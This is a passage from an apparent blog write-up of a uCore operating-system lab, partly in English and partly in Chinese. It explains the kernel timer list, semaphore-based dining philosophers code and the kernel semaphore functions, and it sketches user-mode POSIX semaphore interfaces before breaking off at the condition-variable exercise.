class="built_in">run_timer_list</span>(); <span class="comment">// note this line</span></span><br><span class="line">        <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure><h4 id="定时器timer">The timer</h4><ul><li><p>The <code>timer_t</code> structure stores the data a timer needs, namely the <strong>remaining countdown</strong> and the <strong>process bound to it</strong>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> expires;       <span class="comment">//the expire time</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc;   <span class="comment">//the proc wait in this timer. 
If the expire time is end, then this proc will be scheduled</span></span><br><span class="line">    <span class="type">list_entry_t</span> timer_link;    <span class="comment">//the timer list</span></span><br><span class="line">&#125; <span class="type">timer_t</span>;</span><br></pre></td></tr></table></figure></li><li><p><code>add_timer</code> adds a <code>timer</code> to the timer list.</p><p>For performance reasons, every newly added timer is inserted in order of its <code>expires</code> value, and the <code>expires</code> values of the timers ahead of it are subtracted from its own, so each entry stores only the difference from its predecessor. An example:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Two timers not yet added to the list:</span><br><span class="line">  timer1-&gt;expires = <span class="number">20</span>;</span><br><span class="line">  timer2-&gt;expires = <span class="number">38</span>;</span><br><span class="line">After adding both timers to the list (note the expires of timer2):</span><br><span class="line">  +------------+       +----------------------+       +--------------------------+</span><br><span class="line">  | timer_list | &lt;---&gt; | timer1-&gt;expires = <span class="number">20</span> | &lt;---&gt; | timer2-&gt;expires = <span class="number">18</span> !!! 
|</span><br><span class="line">  +------------+       +----------------------+       +--------------------------+</span><br></pre></td></tr></table></figure><p>This way, advancing every timer in timer_list only requires decrementing the <strong>expires of the first timer</strong> at the head of the list, which <strong>indirectly reduces the effective expires of all timers by one.</strong></p><p>The source code of the function is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// add timer to timer_list</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">add_timer</span><span class="params">(<span class="type">timer_t</span> *timer)</span> </span>&#123;</span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">assert</span>(timer-&gt;expires &gt; <span class="number">0</span> &amp;&amp; timer-&gt;proc != <span class="literal">NULL</span>);</span><br><span class="line">        <span class="built_in">assert</span>(<span class="built_in">list_empty</span>(&amp;(timer-&gt;timer_link)));</span><br><span class="line">        <span 
class="type">list_entry_t</span> *le = <span class="built_in">list_next</span>(&amp;timer_list);</span><br><span class="line">        <span class="comment">// subtract the expires of every timer passed over</span></span><br><span class="line">        <span class="keyword">while</span> (le != &amp;timer_list) &#123;</span><br><span class="line">            <span class="type">timer_t</span> *next = <span class="built_in">le2timer</span>(le, timer_link);</span><br><span class="line">            <span class="keyword">if</span> (timer-&gt;expires &lt; next-&gt;expires) &#123;</span><br><span class="line">                next-&gt;expires -= timer-&gt;expires;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            timer-&gt;expires -= next-&gt;expires;</span><br><span class="line">            le = <span class="built_in">list_next</span>(le);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// insert the timer into the list</span></span><br><span class="line">        <span class="built_in">list_add_before</span>(le, &amp;(timer-&gt;timer_link));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>run_timer_list</code> advances the timers and updates the running time slice of the current process. When a timer's remaining time reaches zero, it wakes the process bound to that timer, which is expected to be waiting with the <code>WT_INTERRUPTED</code> bit set in its wait state. As noted for the previous function, <strong>advancing every timer in timer_list only requires decrementing the expires of the first timer at the head of the list</strong>. The source code of the function is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// call scheduler to update tick related info, and check whether the timer has expired; if expired, then wake up proc</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">run_timer_list</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">list_entry_t</span> *le = <span class="built_in">list_next</span>(&amp;timer_list);</span><br><span class="line">        <span class="keyword">if</span> (le != &amp;timer_list) &#123;</span><br><span class="line">            <span class="type">timer_t</span> *timer = <span class="built_in">le2timer</span>(le, timer_link);</span><br><span class="line">            <span class="built_in">assert</span>(timer-&gt;expires != <span class="number">0</span>);</span><br><span class="line">            <span class="comment">// decrement only the expires of the head timer</span></span><br><span class="line">            timer-&gt;expires --;</span><br><span class="line">            
<span class="keyword">while</span> (timer-&gt;expires == <span class="number">0</span>) &#123;</span><br><span class="line">                le = <span class="built_in">list_next</span>(le);</span><br><span class="line">                <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc = timer-&gt;proc;</span><br><span class="line">                <span class="keyword">if</span> (proc-&gt;wait_state != <span class="number">0</span>) &#123;</span><br><span class="line">                    <span class="built_in">assert</span>(proc-&gt;wait_state &amp; WT_INTERRUPTED);</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">else</span> &#123;</span><br><span class="line">                    <span class="built_in">warn</span>(<span class="string">&quot;process %d&#x27;s wait_state == 0.\n&quot;</span>, proc-&gt;pid);</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="built_in">wakeup_proc</span>(proc);</span><br><span class="line">                <span class="built_in">del_timer</span>(timer);</span><br><span class="line">                <span class="keyword">if</span> (le == &amp;timer_list) &#123;</span><br><span class="line">                    <span class="keyword">break</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                timer = <span class="built_in">le2timer</span>(le, timer_link);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="built_in">sched_class_proc_tick</span>(current);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Removing a timer from timer_list is simple: <strong>add the removed timer's remaining expires to the expires of the next timer</strong>, so that later timers keep their expiry times, and then <strong>unlink the timer from the list</strong>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// del timer from timer_list</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">del_timer</span><span class="params">(<span class="type">timer_t</span> *timer)</span> </span>&#123;</span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="built_in">list_empty</span>(&amp;(timer-&gt;timer_link))) &#123;</span><br><span class="line">            <span class="keyword">if</span> (timer-&gt;expires != <span class="number">0</span>) &#123;</span><br><span class="line">                <span class="type">list_entry_t</span> *le = <span class="built_in">list_next</span>(&amp;(timer-&gt;timer_link));</span><br><span class="line">                <span class="keyword">if</span> (le != &amp;timer_list) &#123;</span><br><span class="line">                    <span class="type">timer_t</span> *next = <span 
class="built_in">le2timer</span>(le, timer_link);</span><br><span class="line">                    next-&gt;expires += timer-&gt;expires;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="built_in">list_del_init</span>(&amp;(timer-&gt;timer_link));</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>A simple example: the <code>do_sleep</code> function</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">do_sleep</span><span class="params">(<span class="type">unsigned</span> <span class="type">int</span> time)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (time == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span 
class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    <span class="comment">// set up the timer</span></span><br><span class="line">    <span class="type">timer_t</span> __timer, *timer = <span class="built_in">timer_init</span>(&amp;__timer, current, time);</span><br><span class="line">    current-&gt;state = PROC_SLEEPING;</span><br><span class="line">    current-&gt;wait_state = WT_TIMER;</span><br><span class="line">    <span class="comment">// arm the timer</span></span><br><span class="line">    <span class="built_in">add_timer</span>(timer);</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">    <span class="comment">// the current process gives up the CPU</span></span><br><span class="line">    <span class="built_in">schedule</span>();</span><br><span class="line">    <span class="comment">// the time is up, so remove the timer</span></span><br><span class="line">    <span class="built_in">del_timer</span>(timer);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>What timers are for: a timer lets the operating system perform an action <strong>after a given amount of time has elapsed</strong>, such as waking a sleeping thread. In a sense, <strong>timers are what give the operating system a notion of time</strong>.</p></li></ul><h3 id="练习1">Exercise 1</h3><blockquote><p>Understand the implementation of kernel-level semaphores and the semaphore-based solution to the dining philosophers problem</p></blockquote><ul><li><p>The dining philosophers problem</p><ul><li><p>The main dining philosophers code in uCore is fairly simple: each philosopher picks up the forks, eats, and then puts the forks down.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 
class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> state_sema[N]; <span class="comment">/* array recording the state of each philosopher */</span></span><br><span class="line"><span class="comment">/* a semaphore is a special kind of integer variable */</span></span><br><span class="line"><span class="type">semaphore_t</span> mutex; <span class="comment">/* mutual exclusion for the critical section */</span></span><br><span class="line"><span class="type">semaphore_t</span> s[N]; <span class="comment">/* one semaphore per philosopher */</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">proc_struct</span> *philosopher_proc_sema[N];</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">philosopher_using_semaphore</span><span class="params">(<span class="type">void</span> * arg)</span> <span class="comment">/* i: philosopher number, from 0 to N-1 */</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">int</span> i, iter=<span class="number">0</span>;</span><br><span class="line">    i=(<span class="type">int</span>)arg;</span><br><span class="line">    <span class="built_in">cprintf</span>(<span class="string">&quot;I am No.%d philosopher_sema\n&quot;</span>,i);</span><br><span class="line">    <span class="keyword">while</span>(iter++&lt;TIMES)</span><br><span class="line">    &#123; <span class="comment">/* repeat for TIMES iterations */</span></span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;Iter %d, No.%d philosopher_sema is thinking\n&quot;</span>,iter,i); <span 
class="comment">/* the philosopher is thinking */</span></span><br><span class="line">        <span class="built_in">do_sleep</span>(SLEEP_TIME);</span><br><span class="line">        <span class="built_in">phi_take_forks_sema</span>(i);</span><br><span class="line">        <span class="comment">/* acquire two forks, or block */</span></span><br><span class="line">        <span class="built_in">cprintf</span>(<span class="string">&quot;Iter %d, No.%d philosopher_sema is eating\n&quot;</span>,iter,i); <span class="comment">/* eating */</span></span><br><span class="line">        <span class="built_in">do_sleep</span>(SLEEP_TIME);</span><br><span class="line">        <span class="built_in">phi_put_forks_sema</span>(i);</span><br><span class="line">        <span class="comment">/* put both forks back on the table */</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">cprintf</span>(<span class="string">&quot;No.%d philosopher_sema quit\n&quot;</span>,i);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Picking up or putting down forks modifies the philosopher's state, which is a <strong>globally shared variable</strong>, so the mutex must be held to prevent a race condition.</p><p>When a philosopher puts the forks back on the table, both neighbors are checked: a neighbor that is <strong>hungry</strong> (ready to eat but still waiting for forks) and can now obtain both forks is woken up and starts eating.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span 
class="title">phi_take_forks_sema</span><span class="params">(<span class="type">int</span> i)</span> <span class="comment">/* i: philosopher number, from 0 to N-1 */</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">        <span class="built_in">down</span>(&amp;mutex); <span class="comment">/* enter the critical section */</span></span><br><span class="line">        state_sema[i]=HUNGRY; <span class="comment">/* record that philosopher i is hungry */</span></span><br><span class="line">        <span class="built_in">phi_test_sema</span>(i); <span class="comment">/* try to acquire two forks */</span></span><br><span class="line">        <span class="built_in">up</span>(&amp;mutex); <span class="comment">/* leave the critical section */</span></span><br><span class="line">        <span class="built_in">down</span>(&amp;s[i]); <span class="comment">/* block if the forks were not acquired */</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">phi_put_forks_sema</span><span class="params">(<span class="type">int</span> i)</span> <span class="comment">/* i: philosopher number, from 0 to N-1 */</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">        <span class="built_in">down</span>(&amp;mutex); <span class="comment">/* enter the critical section */</span></span><br><span class="line">        state_sema[i]=THINKING; <span class="comment">/* the philosopher has finished eating */</span></span><br><span class="line">        <span class="built_in">phi_test_sema</span>(LEFT); <span class="comment">/* check whether the left neighbor can eat now */</span></span><br><span class="line">        <span class="built_in">phi_test_sema</span>(RIGHT); <span class="comment">/* check whether the right neighbor can eat now */</span></span><br><span class="line">        <span class="built_in">up</span>(&amp;mutex); <span class="comment">/* leave the critical section */</span></span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>phi_test_sema</code> sets a philosopher's eating state. If philosopher <code>i</code> is hungry and neither neighbor is eating, it marks the philosopher as eating and performs a V operation on that philosopher's semaphore, which <strong>wakes</strong> the thread of the philosopher waiting for forks.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">phi_test_sema</span><span class="params">(<span class="type">int</span> i)</span> <span class="comment">/* i: philosopher number, from 0 to N-1 */</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(state_sema[i]==HUNGRY&amp;&amp;state_sema[LEFT]!=EATING</span><br><span class="line">            &amp;&amp;state_sema[RIGHT]!=EATING)</span><br><span class="line">    &#123;</span><br><span class="line">        state_sema[i]=EATING;</span><br><span class="line">        <span class="built_in">up</span>(&amp;s[i]);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>Describe the design of the kernel-level semaphore and outline its execution flow</p><ul><li><p>The kernel's semaphore structure is shown below. It differs little from the one presented in operating systems theory courses.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">    <span class="type">int</span> value;</span><br><span class="line">    <span class="type">wait_queue_t</span> wait_queue;</span><br><span class="line">&#125; <span 
class="type">semaphore_t</span>;</span><br></pre></td></tr></table></figure></li><li><p>To enter a critical section, uCore calls the <code>down</code> function:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">down</span>(&amp;mutex); <span class="comment">/* enter the critical section */</span></span><br></pre></td></tr></table></figure><p>Correspondingly, it calls the <code>up</code> function when leaving the critical section:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">up</span>(&amp;mutex); <span class="comment">/* leave the critical section */</span></span><br></pre></td></tr></table></figure><blockquote><p><code>down</code> and <code>up</code> are wrappers around <code>__down</code> and <code>__up</code> respectively. Besides the semaphore, they also pass in a wait state, <code>wait_state</code>.</p></blockquote></li><li><p><code>__down</code> decrements the semaphore's <code>value</code> when it is greater than 0. Otherwise it adds the current process to the wait queue <code>wait_queue</code> and makes the current thread <strong>give up the CPU immediately</strong> so that another thread is scheduled. <strong>Note the atomic sections, which run with interrupts disabled between <code>local_intr_save</code> and <code>local_intr_restore</code></strong>. The source code of the function is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span 
class="line"><span class="type">static</span> __noinline <span class="type">uint32_t</span> __down(<span class="type">semaphore_t</span> *sem, <span class="type">uint32_t</span> wait_state) &#123;</span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    <span class="keyword">if</span> (sem-&gt;value &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// decrement value</span></span><br><span class="line">        sem-&gt;value --;</span><br><span class="line">        <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// value was not positive, so add the current process to the wait queue</span></span><br><span class="line">    <span class="type">wait_t</span> __wait, *wait = &amp;__wait;</span><br><span class="line">    <span class="built_in">wait_current_set</span>(&amp;(sem-&gt;wait_queue), wait, wait_state);</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">    <span class="comment">// reschedule</span></span><br><span class="line">    <span class="built_in">schedule</span>();</span><br><span class="line">    <span class="comment">// remove the current process from the wait queue</span></span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    <span class="built_in">wait_current_del</span>(&amp;(sem-&gt;wait_queue), wait);</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (wait-&gt;wakeup_flags != wait_state) &#123;</span><br><span class="line">        <span 
class="keyword">return</span> wait-&gt;wakeup_flags;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>__up</code> is a little simpler: if no thread is waiting it performs <code>value++</code>, otherwise it wakes the first waiting thread.</p><blockquote><p>Note: when <code>__up</code> wakes the first waiting thread, <code>value</code> is not incremented.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> __noinline <span class="type">void</span> __up(<span class="type">semaphore_t</span> *sem, <span class="type">uint32_t</span> wait_state) &#123;</span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">wait_t</span> *wait;</span><br><span class="line">        <span class="comment">// if no thread is waiting in the queue, increment value as usual</span></span><br><span class="line">        <span class="keyword">if</span> ((wait = <span class="built_in">wait_queue_first</span>(&amp;(sem-&gt;wait_queue))) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">            sem-&gt;value ++;</span><br><span class="line">        &#125;</span><br><span class="line">        
<span class="comment">// otherwise a thread is waiting in the queue: wake it so that it can resume running</span></span><br><span class="line">        <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="built_in">assert</span>(wait-&gt;proc-&gt;wait_state == wait_state);</span><br><span class="line">            <span class="built_in">wakeup_wait</span>(&amp;(sem-&gt;wait_queue), wait, wait_state, <span class="number">1</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>Propose a design for providing semaphores to user-mode processes/threads, and compare it with the kernel-level semaphore mechanism</p><ul><li><p>To provide semaphores to user-mode processes/threads, the kernel has to expose a set of application programming interfaces, because user-mode threads can only use kernel services through the interfaces the kernel provides. Modeled on the standard POSIX semaphore interface available on Linux, these interfaces could be:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span 
class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*Initialize semaphore object SEM to VALUE.  If PSHARED then share it</span></span><br><span class="line"><span class="comment">   with other processes.  */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sem_init</span> <span class="params">(<span class="type">sem_t</span> *__sem, <span class="type">int</span> __pshared, <span class="type">unsigned</span> <span class="type">int</span> __value)</span></span>;</span><br><span class="line"><span class="comment">/* Free resources associated with semaphore object SEM.  */</span></span><br><span class="line"><span class="comment">// release all resources used by the semaphore</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sem_destroy</span> <span class="params">(<span class="type">sem_t</span> *__sem)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Open a named semaphore NAME with open flags OFLAG.  */</span></span><br><span class="line"><span class="comment">// open a named semaphore, using the given flags to control how it is opened</span></span><br><span class="line"><span class="function"><span class="type">sem_t</span> *<span class="title">sem_open</span> <span class="params">(<span class="type">const</span> <span class="type">char</span> *__name, <span class="type">int</span> __oflag, ...)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Close descriptor for named semaphore SEM.  
*/</span></span><br><span class="line"><span class="comment">// close the descriptor used by this semaphore</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sem_close</span> <span class="params">(<span class="type">sem_t</span> *__sem)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Remove named semaphore NAME.  */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sem_unlink</span> <span class="params">(<span class="type">const</span> <span class="type">char</span> *__name)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Wait for SEM being posted.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">   This function is a cancellation point and therefore not marked with</span></span><br><span class="line"><span class="comment">   __THROW.  */</span></span><br><span class="line"><span class="comment">// a P operation: if sem value &gt; 0, then sem value--; otherwise block until sem value &gt; 0</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sem_wait</span> <span class="params">(<span class="type">sem_t</span> *__sem)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Test whether SEM is posted.  */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sem_trywait</span> <span class="params">(<span class="type">sem_t</span> *__sem)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Post SEM.  
*/</span></span><br><span class="line"><span class="comment">// 一个V操作，把指定的信号量 sem 的值加 1，唤醒正在等待该信号量的任意线程。</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sem_post</span> <span class="params">(<span class="type">sem_t</span> *__sem)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Get current value of SEM and store it in *SVAL.  */</span></span><br><span class="line"><span class="comment">// 获取当前信号量的值</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sem_getvalue</span> <span class="params">(<span class="type">sem_t</span> *__restrict __sem, <span class="type">int</span> *__restrict __sval)</span></span>;</span><br></pre></td></tr></table></figure></li><li><p>相同点</p><ul><li>其核心的实现逻辑是一样的</li></ul></li><li><p>不同点</p><ul><li>内核态的信号量机制可以直接调用内核的服务，而用户态的则需要通过内核提供的接口来访问内核态服务，这其中涉及到了用户态转内核态的相关机制。</li><li>内核态的信号量存储于内核栈中；但用户态的信号量存储于用户栈中。</li></ul></li></ul></li></ul><h3 id="练习2">练习2</h3><blockquote><p>总体任务：完成内核级条件变量和基于内核级条件变量的哲学家就餐问题</p></blockquote><blockquote><ol><li>基于信号量实现完成条件变量实现，给出内核级条件变量的设计描述，并说明其大致执行流程。</li></ol></blockquote><ul><li><p>管程由一个锁和多个条件变量组成，以下是管程和条件变量的结构体代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span 